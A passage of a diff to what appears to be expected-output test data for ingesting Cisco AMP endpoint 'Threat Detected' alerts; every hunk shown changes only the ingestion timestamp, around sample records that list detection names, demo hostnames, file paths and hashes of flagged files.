Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -790,7 +790,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337089500Z", + "ingested": "2021-12-14T14:40:41.774810889Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":256000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196247\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -874,7 +874,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337095400Z", + "ingested": "2021-12-14T14:40:41.774811299Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196246\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -958,7 +958,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337101500Z", + "ingested": "2021-12-14T14:40:41.774811946Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196245\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -1042,7 +1042,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337107300Z",
+ "ingested": "2021-12-14T14:40:41.774812368Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":209000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196244\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -1126,7 +1126,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337113Z",
+ "ingested": "2021-12-14T14:40:41.774812835Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196243\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -1210,7 +1210,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337118800Z",
+ "ingested": "2021-12-14T14:40:41.774813252Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":147000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196242\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -1294,7 +1294,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337124600Z",
+ "ingested": "2021-12-14T14:40:41.774813732Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196241\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -1378,7 +1378,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337130600Z",
+ "ingested": "2021-12-14T14:40:41.774814273Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196240\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -1458,7 +1458,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337136400Z",
+ "ingested": "2021-12-14T14:40:41.774814763Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259080131183000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":996000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259080131182683\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -1542,7 +1542,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337142200Z",
+ "ingested": "2021-12-14T14:40:41.774849335Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":944000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251507855228943\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -1626,7 +1626,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337148100Z",
+ "ingested": "2021-12-14T14:40:41.774849864Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -1710,7 +1710,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337153900Z",
+ "ingested": "2021-12-14T14:40:41.774850274Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":821000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261640\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -1809,7 +1809,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337159700Z",
+ "ingested": "2021-12-14T14:40:41.774850756Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261639\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -1897,7 +1897,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337165500Z",
+ "ingested": "2021-12-14T14:40:41.774851223Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261638\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
 "code": "1090519054",
 "kind": "alert",
@@ -1996,7 +1996,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:35:36.337170800Z",
+ "ingested": "2021-12-14T14:40:41.774851861Z",
 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":680000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261637\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\